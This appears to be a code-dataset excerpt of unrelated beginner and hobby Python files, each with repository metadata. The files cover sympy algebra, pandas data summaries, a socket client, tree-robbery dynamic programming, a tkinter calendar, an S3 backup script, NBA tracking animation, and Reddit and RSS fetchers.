expr = sympy.logcombine(sympy.log(a) - sympy.log(b))
print('logcombine:',expr)
# 合并某个同类项
expr = x + y + x * y * z
print('collect x:',expr.collect(x))
print('collect y:',expr.collect(y))
# 通过apart函数简化表达式
expr = 1/(x**2 + 3*x + 2)
print('apart',sympy.apart(expr, x))
# 通过together函数简化表达式
print('together:',sympy.together(1 / (y * x + y) + 1 / (1+x)))
# 通过cancel函数简化表达式
print('cancel:',sympy.cancel(y / (y * x + y)))
# 表达式变量替换
# 将变量x替换成y
expr = (x + y).subs(x, y)
print('subs:x->y:',expr)
expr = sympy.sin(x * sympy.exp(x)).subs(x, y)
print('subs:',expr)
# 一次性替换多个变量
expr = sympy.sin(x * z).subs({z: sympy.exp(y), x: y, sympy.sin: sympy.cos})
print('subs:',expr)
# 表达式变量赋值
expr = x * y + z**2 *x
values = {x: 1.25, y: 0.4, z: 3.2}
print('subs:',expr.subs(values)) | true |
a5240139c3dc314f44ce6e9d411906e764bd1e0b | Python | eventia/zbc_python | /numberdemo.py | UTF-8 | 131 | 2.84375 | 3 | [] | no_license | import sys
t1 = sys.maxsize
t2 = t1 + 1
t3 = t2**10
print(t1)
print(t2)
print(t3)
print(type(t1))
print(type(t2))
print(type(t3))
| true |
a08f55766efecdc7a97c7cbacc172356a80e56db | Python | Akif-Mufti/Machine-Learning-with-Python | /datapanda.py | UTF-8 | 842 | 3.375 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Thu Mar 30 15:11:56 2017
@author: user
"""
# Load CSV using Pandas
from pandas import read_csv
from pandas import set_option
filename = 'pima-indians-diabetes.data.csv'
names = ['preg', 'plas', 'pres', 'skin', 'test', 'mass', 'pedi', 'age', 'class']
data = read_csv(filename, names=names)
print(data.shape)
# View first 20 rows
peek = data.head(20)
print(peek)
types = data.dtypes
print(types)
data = read_csv(filename, names=names)
set_option('display.width', 100)
set_option('precision', 3)
# Statistical Summary
description = data.describe()
print(description)
# Class Distribution
class_counts = data.groupby('class').size()
print(class_counts)
# Pairwise Pearson correlations
correlations = data.corr(method='pearson')
print(correlations)
# Skew for each attribute
skew = data.skew()
print(skew) | true |
b0b5a65c56695f0a98a2ddb027a091212df17070 | Python | PetterMinne/bachelor-drone | /Pyscripts/client.py | UTF-8 | 666 | 2.828125 | 3 | [] | no_license | import socket
def Main():
host = '127.0.0.1'
port = 5000
mySocket = socket.socket()
mySocket.connect((host,port))
x=0
y=7
messagex = str(x) +'#'+str(y)
while x != 10:
mySocket.send(messagex.encode())
data = mySocket.recv(1024).decode()
print ('Received from server: ' + data)
x = x+1
messagex = str(x) + '#'+str(y)
mySocket.close()
if __name__ == '__main__':
Main()
| true |
894475263bc04631689090a3d14c7c4172f276d6 | Python | HalfMoonFatty/Interview-Questions | /337. House Robber III.py | UTF-8 | 3,366 | 4.03125 | 4 | [] | no_license | '''
Problem:
The thief has found himself a new place for his thievery again. There is only one entrance to this area, called the "root."
Besides the root, each house has one and only one parent house. The thief realized that all houses in this place forms a binary tree.
It will automatically contact the police if two directly-linked houses were broken into on the same night.
Determine the maximum amount of money the thief can rob tonight without alerting the police.
Example 1:
3
/ \
2 3
\ \
3 1
Maximum amount of money the thief can rob = 3 + 3 + 1 = 7.
Example 2:
3
/ \
4 5
/ \ \
1 3 1
Maximum amount of money the thief can rob = 4 + 5 = 9.
'''
'''
Step I -- Recursion
'''
public int rob(TreeNode root) {
if (root == null) {
return 0;
}
int val = 0;
if (root.left != null) {
val += rob(root.left.left) + rob(root.left.right);
}
if (root.right != null) {
val += rob(root.right.left) + rob(root.right.right);
}
return Math.max(val + root.val, rob(root.left) + rob(root.right));
}
'''
Step II -- use a hash map to record the results for visited subtrees (overlapping of the subproblems)
'''
public int rob(TreeNode root) {
Map<TreeNode, Integer> map = new HashMap<>();
return robSub(root, map);
}
private int robSub(TreeNode root, Map<TreeNode, Integer> map) {
if (root == null) return 0;
if (map.containsKey(root)) return map.get(root);
int val = 0;
if (root.left != null) {
val += robSub(root.left.left, map) + robSub(root.left.right, map);
}
if (root.right != null) {
val += robSub(root.right.left, map) + robSub(root.right.right, map);
}
val = Math.max(val + root.val, robSub(root.left, map) + robSub(root.right, map));
map.put(root, val);
return val;
}
'''
Step III -- Think one step back
For each tree root, there are two scenarios: it is robbed or is not. rob(root) does not distinguish between these two cases,
so "information is lost as the recursion goes deeper and deeper", which resulted in repeated subproblems.
Redefine rob(root) as a new function which will return an array of two elements:
the 1st element denotes the maximum amount of money robbed if root is robbed = root.val + rob(root.left)[1] + rob(root.right)[1]
the 2nd element denotes the maximum amount of money that can be robbed if root is NOT robbed = max(leftVals[0],leftVals[1]) + max(rightVals[0],rightVals[1])
dfs all the nodes of the tree, each node return two number, int[] num,
num[0] is the max value while rob this node, num[1] is max value while not rob this value.
'''
class Solution(object):
def rob(self, root):
def dfs(root):
if not root: return [0,0]
leftVals = dfs(root.left)
rightVals = dfs(root.right)
res = [0,0]
# root is robbed and not rob the nodes of root.left and root.right
res[0] = root.val + leftVals[1] + rightVals[1]
# root is not robbed and we are free to rob the left and right subtrees.
res[1] = max(leftVals[0],leftVals[1]) + max(rightVals[0],rightVals[1])
return res
result = dfs(root)
return max(result[0],result[1])
| true |
3028524bdb55c02308aa19ccd5a715d6565859ca | Python | Infinite-Loop-KJSIEIT/Project-Euler | /27.py | UTF-8 | 468 | 3.03125 | 3 | [] | no_license | import itertools
a=[0]*(10**6)
for i in range(2,len(a)):
for j in range(2*i,10**6,i):
a[j]=1
prime=set()
for i in range(2,10**6):
if a[i]==0:
prime.add(i)
def isp(n):
if n in prime:
return True
return False
def conp(ab):
a,b=ab
for i in itertools.count():
n=i*i+i*a+b
if not isp(n):
return i
ans=max(((a,b) for a in range(-999,1000) for b in range(2,1000)), key=conp)
print(ans[0]*ans[1])
| true |
c9a508e14c47940589fcbd68710f877d88637e9b | Python | MarsWilliams/PythonExercises | /LearnPythonTheHardWay/ex19.py | UTF-8 | 1,298 | 4.625 | 5 | [] | no_license | #takes two arguments and prints them back within strings
def cheese_and_crackers(cheese_count, boxes_of_crackers):
print "You have %d cheeses!" % cheese_count
print "You have %d boxes of crackers!" % boxes_of_crackers
print "Man that's enough for a party!"
print "Get a blanket. \n"
#prints a string
print "We can just give the function numbers directly:"
#passes two arguments to the function cheese_and_crackers
cheese_and_crackers(20, 30)
#prints a string
print "Or, we can use variable from our script:"
#assigns an integer to a variable
amount_of_cheese = 10
#assigns an integer to a variable
amount_of_crackers = 50
#passes two arguments (that point to the information stored in two variables) to the function cheese_and_crackers
cheese_and_crackers(amount_of_cheese, amount_of_crackers)
#prints a string
print "We can even do math inside too:"
#passes to equations to evaluate as arguments to the function cheese_and_crackers
cheese_and_crackers(10 + 20, 5 + 6)
#prints a string
print "And we can combine the two, variable and math:"
#passes two arguments to the function cheese_and_crackers. Both point to previously defined variables, and both modify the information contained in those variables.
cheese_and_crackers(amount_of_cheese + 100, amount_of_crackers + 1000)
| true |
ee3262d41433c8ceaac5c0fd30be7381d37b241c | Python | MollyInThatOJ/cmpsc465-fa20 | /assignment1/problem2/DQV5105CMPSC465HW1PT2.py | UTF-8 | 472 | 3.015625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Wed Sep 2 21:14:50 2020
@author: mama
"""
line1 = input()
line2 = [int(i) for i in input().split()]
n1 = line1[0]
n2 = line2[0]
sortedout = [None]*(n1)
i = 0
k = 0
for i in line2:
if i==min(line2):
sortedout[k] = min(line2)
print(line2[min(line2)])
line2.pop(line2[i])
k+=1
out =str(sortedout[0])
for i in sortedout[1:]:
out+=' '+str(i)
print(out) | true |
193edca118761cc9a4fd8a6a7745914f30d7885f | Python | Aasthaengg/IBMdataset | /Python_codes/p02845/s595783119.py | UTF-8 | 240 | 2.96875 | 3 | [] | no_license | n = int(input())
a = list(map(int,input().split()))
mod = 10**9+7
see = [0 for i in range(n)]
ans = 1
for i in range(n):
x = a[i]
if x == 0:
ans = ans*(3-see[x])%mod
else:
ans = ans*(see[x-1]-see[x])%mod
see[x]+=1
print(ans) | true |
7c83694aa637f64705113a567067b63900ce010a | Python | chriskopacz/python_practice | /Problems/lev3/lev3_q18.py | UTF-8 | 2,138 | 4.125 | 4 | [] | no_license | #Chris Kopacz
#Python Exercises from Github
#Level 3, question 18
#created: 26 June 2017
"""
Question 18
Level 3
Question:
A website requires users to input username and password to register. Write a program to
check the validity of passwords input by users.
Following are the criteria for checking the password:
1. At least one letter between [a-z]
2. At least one number between [0-9]
3. At least one letter between [A-Z]
4. At least one character from [$#@]
5. Minimum length of 6 characters
6. Maximum length of 12 characters
Your program should accept a sequence of comma-separated passwords and will check them
according to the above criteria. Passwords that match the criteria are to be printed,
each separated by a comma.
Example:
If the following passwords are given as input to the program:
ABd1234@1,a F1#,2w3E*,2We3345
Then the output should be:
ABd1234@1
"""
import re
#==================
#define checkPass()
def checkPass(a):
if len(a)>=6 and len(a)<=12:
if re.search("[a-z]",a):
if re.search("[0-9]",a):
if re.search("[A-Z]",a):
if re.search("[$#@]",a):
return a
else:
return '0'
else:
return '0'
else:
return '0'
else:
return '0'
else:
return '0'
#==============
#define main()
def main():
passList = []
returnList = []
validList = []
result = ''
userIn = input('Enter a list of comma-separated passwords:\n>>> ')
passList = userIn.split(',')
for iter in range(0,len(passList)):
returnList.append(checkPass(passList[iter]))
for iter in range(0,len(returnList)):
if returnList[iter] != '0':
validList.append(returnList[iter])
if len(validList) > 1:
result = ','.join(validList)
print(result)
elif len(validList)==1:
result = validList[0]
print(result)
else:
result = 'None'
print(result)
#===========
#call main()
if __name__ == "__main__":
main()
| true |
7884422147ec00d9578d7628ac5ac9d1f77b61a4 | Python | opasha/Python | /string_representation.py | UTF-8 | 570 | 4.3125 | 4 | [] | no_license | class Fighter:
def __init__(self, name):
self.name = name
self.health = 100
self.damage = 10
def attack(self, other_guy):
other_guy.health = other_guy.health - self.damage #other_guy is omar, self is joe
print("{} attacks {}!".format(self.name, other_guy.name))
print("{} loses {} health points!".format(other_guy.name, self.damage))
def __str__(self):
return "{}: {}".format(self.name, self.health) #overrides the print method to make things cleaner
omar = Fighter("Omar")
joe = Fighter("Joe")
print(omar)
print(joe)
joe.attack(omar)
print(omar) | true |
ded48a66eb46c0d750e2b9afd1040c9753258fe3 | Python | tkkhuu/SelfDrivingBehavioralCloning | /model/DataLoaderBC.py | UTF-8 | 2,358 | 2.671875 | 3 | [] | no_license | import cv2
import numpy as np
from sklearn.utils import shuffle
from TKDNNUtil.DataLoader import DataLoader
class DataLoaderBC(DataLoader):
def GenerateTrainingBatch(self, samples, batch_size=32, flip_images=True, side_cameras=True):
num_samples = len(samples)
while 1: # Loop forever so the generator never terminates
shuffle(samples)
for offset in range(0, num_samples, batch_size):
batch_samples = samples[offset:offset+batch_size]
car_images = []
steering_measurements = []
for line in batch_samples:
source_path = line[0]
filename = source_path.split('/')[-1]
current_path = '../SimData/IMG/' + filename
image = cv2.imread(current_path)
measurement = float(line[3])
car_images.append(image)
steering_measurements.append(measurement)
if flip_images:
car_images.append(cv2.flip(image, 1))
steering_measurements.append(measurement*-1.0)
steering_correction = 0.25
if side_cameras:
left_source_path = line[1]
left_filename = left_source_path.split('/')[-1]
left_current_path = '../SimData/IMG/' + left_filename
left_image = cv2.imread(left_current_path)
car_images.append(left_image)
steering_measurements.append(measurement + steering_correction)
right_source_path = line[2]
right_filename = right_source_path.split('/')[-1]
right_current_path = '../SimData/IMG/' + right_filename
right_image = cv2.imread(right_current_path)
car_images.append(right_image)
steering_measurements.append(measurement - steering_correction)
# trim image to only see section with road
X_train = np.array(car_images)
y_train = np.array(steering_measurements)
yield shuffle(X_train, y_train) | true |
c422fb5da36b914899b8998631772e675b4b0069 | Python | jamendo/jamendo-recommendation-sdk | /algorithms/averageitemadj.py | UTF-8 | 815 | 2.796875 | 3 | [] | no_license | from algorithms import AlgorithmBase as A
import numpy as N
class Algorithm(A):
itemsToRatings = {}
ratingAverage=0.0
itemadjK = 3
def train(self,rating):
self.itemsToRatings.setdefault(rating[1],[])
self.itemsToRatings[rating[1]].append(rating[2])
self.ratingAverage+=rating[2]
def postTraining(self,dataset):
self.ratingAverage /= self.ratingCount
#derived from experimentation - average ratings per movie / 2 (=3 for jamendoreviews)
self.itemadjK = self.ratingCount*0.5/len(self.itemsToRatings)
def predict(self,userId,itemId):
return (self.ratingAverage*self.itemadjK + N.sum(self.itemsToRatings.get(itemId,[0]))) / (self.itemadjK + len(self.itemsToRatings.get(itemId,[])))
| true |
ad8f8a019896a44c29121c6dc217b466a89a694c | Python | ssh0/6-2_bifurcate | /myplot_bifurcation_animation.py | UTF-8 | 1,060 | 2.875 | 3 | [] | no_license | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# written by Shotaro Fujimoto, May 2014.
#
import matplotlib.pylab as plt
import matplotlib.animation as animation
import array as array
import numpy as np
fig = plt.figure()
def Plot(func, x0, ntransient, nplot, r0, rmax, dr):
def callback(n):
_Plot(func, r0+dr*n, x0, ntransient, nplot)
plt.gca().set_xlim(r0,rmax)
plt.gca().set_ylim(0,1)
plt.xlabel(r'$r$', fontsize=16)
plt.ylabel(r'$x$', fontsize=16)
plt.title('Bifurcation Diagram')
count=int((rmax-r0)/dr)
animation.FuncAnimation(fig=fig, func=callback, frames=count + 1, repeat=False)
plt.show()
def _Plot(function, r, x0, ntransient, nplot):
n=ntransient+nplot*2
x=array.array('f')
x.append(x0)
for i in range(n):
x.append(function(x[i], r))
plt.scatter([r]*nplot, x[ntransient+1:ntransient+nplot+1],
color='r', s=0.1, marker='.'
)
plt.scatter([r]*nplot, x[ntransient+nplot+1:n+1],
color='b', s=0.1, marker='.'
)
| true |
b8f61b2e586b377e1fad86a6b27dc348b2c6fcfe | Python | tschamp31/Personal | /Python/Homework/loops.py | UTF-8 | 1,383 | 3.84375 | 4 | [] | no_license | for j in range(10): #Problem 1 - Just reads each range(10) 10 times. Hence the 0,1,etc 10 times.
for i in range(10):
print (i, end = " ")
print()
print()
i = 0
for j in range(10): #Problem 1 Version 2 - Built so it reads them vertically. In reality it reads 0, 10 times and so on.
for k in range(10):
print(i, end =" ")
i = i + 1
print()
print()
j = -1
for i in range(10): #Problem 2 - Adds a new number each new line
for j in range(0, j + 2):
print(j, end = " ")
print()
print()
j = 10
for i in range(10): #Problem 3 - Reads one less number each time and adds a space for the missing number
for k in range(i):
print (" ", end = " ")
for j in range(0, j):
print(j, end = " ")
print()
print()
j = 10
for i in range(10): #Problem 3 Version 2 - Reads one less number each time
for j in range(0, j):
print(j, end = " ")
print()
print()
m = 10 #Starting range
j = 11 #Ending range
k = 9 #Starting Number
for i in range(9): #Problem 4
for m in range(m,j): #M is the start range, J is the end range. They are variables so they can scale properly
j = j + 1 #Increases the ending by 1
k = k + 1 #Increases the set number to be printed
print(k, end = " ")
print()
print()
#Not much explained above since the professor gave away most of the Problem
#end = " " is a string function to add a space between characters instead of a new line each read through | true |
b4cb00d7ef3db7e63e8dcf366f757136441081d8 | Python | dhchoi/TransitionBasedParsing | /Transition.py | UTF-8 | 579 | 3.4375 | 3 | [] | no_license | #!/usr/bin/env python
class Transition:
# Transition types
Shift = 0
LeftArc = 1
RightArc = 2
def __init__(self, transitionType, label):
self.transitionType = transitionType
self.label = label
def __str__(self):
return 'Transition of type %d with label %s' % (self.transitionType, self.label)
def __repr__(self):
return str(self)
def __eq__(self, other):
return self.transitionType == other.transitionType and self.label == other.label
def __ne__(self, other):
return not (self == other)
| true |
c68c3d0177b7247e02ebce71016f622b8683e3d4 | Python | emiranda04/python-read-outlook-mails | /tkcalendar.py | UTF-8 | 4,101 | 2.671875 | 3 | [] | no_license | from tkinter import *
from tkinter import ttk
import calendar
from datetime import datetime,date
class TkCalendar(Frame):
def __init__(self, master=None,dt=None):
self.status = 'Ok'
super().__init__(master)
self.grid(row=0, column=0, sticky=N + E + S + W)
self['bg'] = 'black'
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
if dt is None:
self.dt = date.today()
if isinstance(dt,(date)):
self.dt = dt
else:
self.status ='Invalid parameter type {str(dt)}. Should be datetime.date'
self.month = StringVar()
self.year = StringVar()
self.create_widget()
def create_widget(self):
self.container = Frame(self)
self.container.grid(row=0,column=0,sticky=N+E+W+S)
self.container.rowconfigure(0, weight=1)
self.container.columnconfigure(0, weight=1)
cbo_month = ttk.Combobox(self.container,values=calendar.month_abbr[1:],textvariable=self.month)
cbo_month.grid(row=0,column=0,columnspan=4,sticky=N + E + S + W)
cbo_month.rowconfigure(0, weight=1)
cbo_month.columnconfigure(0, weight=1)
cbo_month.bind("<<ComboboxSelected>>", lambda x: self.update_calendar(x, 'M'))
self.month.set(calendar.month_abbr[self.dt.month])
cbo_year = ttk.Combobox(self.container,values=range(self.dt.year-2, self.dt.year),textvariable=self.year)
cbo_year.grid(row=0,column=5,columnspan=4,sticky=N + E + S + W)
cbo_year.rowconfigure(0, weight=1)
cbo_year.columnconfigure(5, weight=1)
self.year.set(self.dt.year)
cbo_year.bind("<<ComboboxSelected>>", lambda x: self.update_calendar(x,'Y'))
self.frm_weekday = Frame(self.container)
self.frm_weekday.grid(row=10,column=0,sticky=N+E+W+S,columnspan=8)
self.frm_weekday.rowconfigure(0, weight=1)
self.frm_weekday.columnconfigure(0, weight=1)
self.create_date_widget(self.frm_weekday)
def create_date_widget(self,frm_weekday):
lbl_mo = ttk.Label(frm_weekday,text='MO')
lbl_mo.grid(row=0,column=0,sticky=N+E+W+S)
lbl_mo.columnconfigure(0,weight=1)
lbl_mo.rowconfigure(0, weight=1)
lbl_tu = ttk.Label(frm_weekday, text='TU')
lbl_tu.grid(row=0, column=4, sticky=N + E + W + S)
lbl_tu.columnconfigure(0, weight=1)
lbl_tu.rowconfigure(0, weight=1)
lbl_we = ttk.Label(frm_weekday, text='WE')
lbl_we.grid(row=0, column=8, sticky=N + E + W + S)
lbl_we.columnconfigure(0, weight=1)
lbl_we.rowconfigure(0, weight=1)
lbl_th = ttk.Label(frm_weekday, text='TH')
lbl_th.grid(row=0, column=12, sticky=N + E + W + S)
lbl_th.columnconfigure(0, weight=1)
lbl_th.rowconfigure(0, weight=1)
lbl_fr = ttk.Label(frm_weekday, text='FR')
lbl_fr.grid(row=0, column=16, sticky=N + E + W + S)
lbl_fr.columnconfigure(0, weight=1)
lbl_fr.rowconfigure(0, weight=1)
lbl_sa = ttk.Label(frm_weekday, text='SA')
lbl_sa.grid(row=0, column=20, sticky=N + E + W + S)
lbl_sa.columnconfigure(0, weight=1)
lbl_sa.rowconfigure(0, weight=1)
lbl_su = ttk.Label(frm_weekday, text='SU')
lbl_su.grid(row=0, column=24, sticky=N + E + W + S)
lbl_su.columnconfigure(0, weight=1)
lbl_su.rowconfigure(0, weight=1)
c = calendar.Calendar()
row = 5
col = 0
print ((calendar.month_abbr[1:].index(self.month.get())))
print ((self.year.get()))
for item in c.itermonthdays2(int(self.year.get()),calendar.month_abbr[0:].index(self.month.get())):
val = '' if item[0] == 0 else item[0]
if val != '':
val = '0' + str(val) if len(str(val)) == 1 else val
btn_day = ttk.Button(frm_weekday,text=val,command=lambda arg=val:self.return_date(arg))
if val == '':
btn_day.state(["disabled"])
btn_day.grid(row=row,column=col,sticky=N+E+S+W)
btn_day.columnconfigure(row, weight=1)
btn_day.rowconfigure(col, weight=1)
col += 4
if item[1] == 6:
col = 0
row += 5
def return_date(self,arg):
self.dt_selected = str(self.year.get()) + '-' + str(self.month.get()) + '-' + str(arg)
def update_calendar(self,event,type):
self.create_date_widget(self.frm_weekday)
if __name__ == '__main__':
root = Tk()
root.columnconfigure(0, weight=1)
root.rowconfigure(0, weight=1)
root.title("CALENDAR")
app = TkCalendar(master=root)
app.mainloop()
| true |
6dc54feb55fbcf3154da535aed2c5a68707ff4a2 | Python | meta-434/bACHup | /bachup.py | UTF-8 | 3,407 | 2.609375 | 3 | [
"MIT"
] | permissive | #created by Alex Hapgood
#Started 02/2018
import boto3
import os
import platform
import datetime
import textwrap
import string
import random
import distutils
build = 'v0.2a7(inc)'
now = datetime.datetime.now()
class payload:
def __init__(self, id, source, time):
self.source = source
self.id = id
self.time = date
#Takes a payload instance, assigns variables, and writes to prefs.txt
def writeToPrefs(payloadInstance):
payloadInstance.id = id_generator()
payloadInstance.time = str(now)
payloadInstance.source = input('Enter target source: ')
with open('prefs.txt', 'a') as f:
f.write('\n' + self.id + ' | ' + self.source + ' | ' + self.time)
f.close()
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for x in range(size))
def startUp():
global build
print('#' * 80)
print('# '' _ ______ _ _ ______ __ '' #\n'
'# ''| | /\ / _____) | | | / __ |/ | '' #\n'
'# ''| | _ / \ | / | |___| |_ _ ____ ____| | //| /_/ | ____ '' #\n'
'# ''| || \ / /\ \| | | ___ | | | | _ \ / ___) |// | | | |/ _ |'' #\n'
'# ''| |_) ) |__| | \_____| | | | |_| | | | | | | | /__| | | ( ( | |'' #\n'
'# ''|____/|______|\______)_| |_|\____| ||_/ |_| \_____(_)|_|\_||_|'' #\n'
'# '' |_| '' #\n'
'# '' '' #')
print('# By Alex H. '' #')
print('#' * 80)
print('\nSystem platform is ++%s++ running release ++%s++.\n' % (platform.system(), platform.release()))
print('current build is %s' % build)
def init():
payloadPath = ''
idHistory = []
s3 = boto3.client('s3')
response = s3.list_buckets()
buckets = [bucket['Name'] for bucket in response ['Buckets']]
existPrefs = input('Would you like to use an exiting prefs.txt file? y/n ')
if existPrefs == "y" or existPrefs == "Y":
with open('prefs.txt') as ins:
history = [line.rstrip('\n') for line in ins]
for item in history:
idHistory.append(item[:6])
print("\nBucket list: %s" % buckets)
print("idHistory list: %s" % idHistory)
#print(set(idHistory).intersection(set(buckets)))
if bool(set(idHistory).intersection(set(buckets))):
print("SUCCESS - MATCH FOUND.\n")
else:
print("NO MATCHING BUCKETS FOUND.\n")
ins.close()
inOrOut = input('[B]ackup / [R]estore? ')
if inOrOut == "B" or inOrOut == "b":
payloadPath = input('Enter the full filepath to the source enclosing folder or single file: ')
else:
restoreBucket = input("Enter id of bucket to preview contents for restore: ")
sys.exit(1)
def payloadLocate():
if os.path.exists(payloadPath) and os.path.isdir(payloadPath):
print(os.listdir(source))
return os.listdir(source)
else:
print('no such file or directory.')
def main():
startUp()
init()
payloadLocate()
if __name__ == "__main__":
print(main())
| true |
9b0b1354f1b9df77b78fc2c32a58a617e2e6d751 | Python | dimitrisnikolaou10/nba_shot_probability_sportvu | /animate/Event.py | UTF-8 | 9,340 | 2.921875 | 3 | [] | no_license | from Moment import Moment
from Constant import Constant
import matplotlib.pyplot as plt
from matplotlib import animation
from moviepy.editor import *
class Event:
""" A class for handling and showing events """
def __init__(self, moments, player_info, event_description, probability_to_make, shot_time, feat_info):
moments_list = [] # Create list of moments (11 rows of the dataframe)
first_index_of_moment, last_index_of_moment, last_index = 0, 11, len(moments) - 1
while last_index_of_moment <= last_index:
df_temp = moments.iloc[first_index_of_moment:last_index_of_moment, :]
moments_list.append(df_temp)
first_index_of_moment, last_index_of_moment = last_index_of_moment, last_index_of_moment + 11
self.moments = [Moment(moment) for moment in moments_list] # store the list in self.moments
player_ids = player_info[0]
player_names = player_info[1]
player_jerseys = player_info[2]
values = list(zip(player_names, player_jerseys))
# Dictionary for player ids that contains Name, Jersey Number
self.player_ids_dict = dict(zip(player_ids, values))
self.event_description = event_description
self.probability_to_make = probability_to_make
self.shot_time = shot_time
self.feat_info = feat_info # tuple with -> [0] opp_1_dist, [1] opp_2_dist, [2] opp_3_dist, [3] ts%
# This function runs iteratively and updates all circles and clock - it is called by the animation function
def update_radius(self, i, player_circles, ball_circle, annotations, clock_info, shot, feature_info):
moment = self.moments[i] # obtain the moment
for j, circle in enumerate(player_circles): # repeat for all players
circle.center = moment.players[j].x, moment.players[j].y # center of circle is x,y coordinates
annotations[j].set_position(circle.center) # add the number of the jersey
clock_test = 'Quarter {:d}\n {:02d}:{:02d}\n {:03.1f}'.format( # format the clock
moment.quarter,
int(moment.game_clock) % 3600 // 60,
int(moment.game_clock) % 60,
moment.shot_clock)
if self.shot_time + 2 + 2 > moment.game_clock > self.shot_time + 2 - 2:
shot.set_color('black')
shot.set_position([39, 5])
feature_info.set_color('black')
feature_info.set_position([44, 2])
else:
shot.set_color('white')
shot.set_position([-5, -5])
feature_info.set_color('white')
feature_info.set_position([-15, -15])
clock_info.set_text(clock_test) # add the clock text based on above
ball_circle.center = moment.ball.x, moment.ball.y # center of ball circle, the x,y coordinates
ball_circle.radius = moment.ball.radius / Constant.NORMALIZATION_COEF # adjust the radius based on height
return player_circles, ball_circle
def show(self):
# Leave some space for inbound passes
ax = plt.axes(xlim=(Constant.X_MIN,
Constant.X_MAX),
ylim=(Constant.Y_MIN,
Constant.Y_MAX))
ax.axis('off')
fig = plt.gcf()
ax.grid(False) # Remove grid
start_moment = self.moments[0]
player_dict = self.player_ids_dict
# mark the shot probability
shot = ax.annotate('Shot probability: ' + str(self.probability_to_make) + '%', xy=[0, 0],
color='white', horizontalalignment='center',
verticalalignment='center', fontweight='bold')
# mark the feature information (opponent distances and ts%)
feature_info = ax.annotate('Closest Opp. distances: ' + str(round(self.feat_info[0], 1)) + ', ' +
str(round(self.feat_info[1], 1)) + ', ' +
str(round(self.feat_info[2], 1)),
xy=[0, 0], color='white', horizontalalignment='center',
verticalalignment='center', fontweight='bold')
# mark the clock (to be precise, note the spot where the clock will be placed)
clock_info = ax.annotate('', xy=[Constant.X_CENTER, Constant.Y_CENTER],
color='black', horizontalalignment='center',
verticalalignment='center')
# mark the jersey numbers on the players
annotations = [ax.annotate(self.player_ids_dict[player.id][1], xy=[0, 0], color='w',
horizontalalignment='center',
verticalalignment='center', fontweight='bold')
for player in start_moment.players]
# Prepare table
# Sort players so you know that in next step you get home team player
sorted_players = sorted(start_moment.players, key=lambda player: player.team.id)
# You now know where there is a home team player and where there is an away team player
home_player = sorted_players[0]
guest_player = sorted_players[5]
# Name the columns based on the name of the teams, also obtain the colour
column_labels = tuple([home_player.team.name, guest_player.team.name])
column_colours = tuple([home_player.team.color, guest_player.team.color])
cell_colours = [column_colours for _ in range(5)]
# Obtain home and away players in Name, Jersey Number format and zip the two lists
home_players = [' #'.join([player_dict[player.id][0], player_dict[player.id][1]]) for player in
sorted_players[:5]]
guest_players = [' #'.join([player_dict[player.id][0], player_dict[player.id][1]]) for player in
sorted_players[5:]]
players_data = list(zip(home_players, guest_players))
# Create the table based on all the previous info (player table)
table = plt.table(cellText=players_data,
colLabels=column_labels,
colColours=column_colours,
colWidths=[Constant.COL_WIDTH, Constant.COL_WIDTH],
loc='top',
cellColours=cell_colours,
fontsize=Constant.FONTSIZE,
cellLoc='center')
table.scale(1, Constant.SCALE)
table_cells = table.properties()['child_artists']
for cell in table_cells:
cell._text.set_color('white')
# Create the second table that goes under. This table will contain description and probability.
# If you want to add second row you have to do [[self.event_description], [xxx]]
# If you want to add second col you have to do [['xxx','xxx']] and also change the colWid to [0.3,0.3]
table = plt.table(cellText=[[self.event_description],
['Probability for shot to go in: ' + str(self.probability_to_make)]],
loc='bottom',
colWidths=[0.6],
cellColours=[['#bcd0e2'], ['#bcd0e2']],
cellLoc='center',
# rowLabels=['Description'],
fontsize=Constant.FONTSIZE)
table.scale(1, Constant.SCALE)
table_cells = table.properties()['child_artists']
for cell in table_cells:
cell._text.set_color('black')
# create 10 player circles and 1 ball circle and add to ax
player_circles = [plt.Circle((0, 0), Constant.PLAYER_CIRCLE_SIZE, color=player.color)
for player in start_moment.players]
ball_circle = plt.Circle((0, 0), Constant.PLAYER_CIRCLE_SIZE,
color=start_moment.ball.color)
for circle in player_circles:
ax.add_patch(circle)
ax.add_patch(ball_circle)
# This is the most important function. It call a function iteratively. The function is update_radius.
# With fargs, I pass all arguments needed for update_radius. Update radius first argument is always the
# frame that we are at. The arguments are the created circles for players and ball, the jersey numbers
# that follow the circles and the clock. If you want to speed up, lower the interval.
anim = animation.FuncAnimation(
fig, self.update_radius,
fargs=(player_circles, ball_circle, annotations, clock_info, shot, feature_info),
frames=len(self.moments), interval=Constant.INTERVAL)
# Add the basketball court in the plot
court = plt.imread('../data/court.png')
plt.imshow(court, zorder=0, extent=[Constant.X_MIN, Constant.X_MAX - Constant.DIFF,
Constant.Y_MAX, Constant.Y_MIN])
# anim.save('../animations/animation.mp4', writer='ffmpeg', fps=25) # save file as mp4
# clip = (VideoFileClip("animations/Curry 28' 3PT Pullup Jump Shot (12 PTS).mp4")) # convert to gif
# clip.write_gif("animations/Curry.gif")
plt.show()
| true |
e5db77cd9936b78bb408c4adfa7afc006708e8ad | Python | BiniyamMelaku2/alx-system_engineering-devops | /0x16-api_advanced/1-top_ten.py | UTF-8 | 784 | 3.28125 | 3 | [] | no_license | #!/usr/bin/python3
"""
queries the Reddit API and prints the titles of the
first 10 hot posts listed for a given subreddit.
https://www.reddit.com/r/programming/hot/.json&limit=10
"""
import json
import requests
def top_ten(subreddit):
"""Return Top10 subreddit hot posts"""
url = "https://www.reddit.com/r/"
url = url + subreddit + "/hot/.json?limit=10"
headers = {
'User-Agent': 'My User Agent 1.0',
'From': '149@holbertonschool.com'
}
result = requests.get(url, headers=headers)
if result.status_code == 200:
result = result.json()
children = result.get('data').get('children')
for i in range(10):
title = children[i].get('data').get('title')
print("{}".format(title))
else:
print("None")
| true |
0d1cc00196f9e66304060292ae245c2b82a876c0 | Python | akauntz/jetson | /packer/rss.py | UTF-8 | 4,306 | 2.65625 | 3 | [] | no_license | import csv
import requests
import xml.etree.ElementTree as ET
import re
from datetime import datetime, timedelta
def loadRSS():
# url of rss feed
url = 'https://www.cnbc.com/id/10000664/device/rss/rss.html'
# creating HTTP response object from given url
resp = requests.get(url)
# saving the xml file
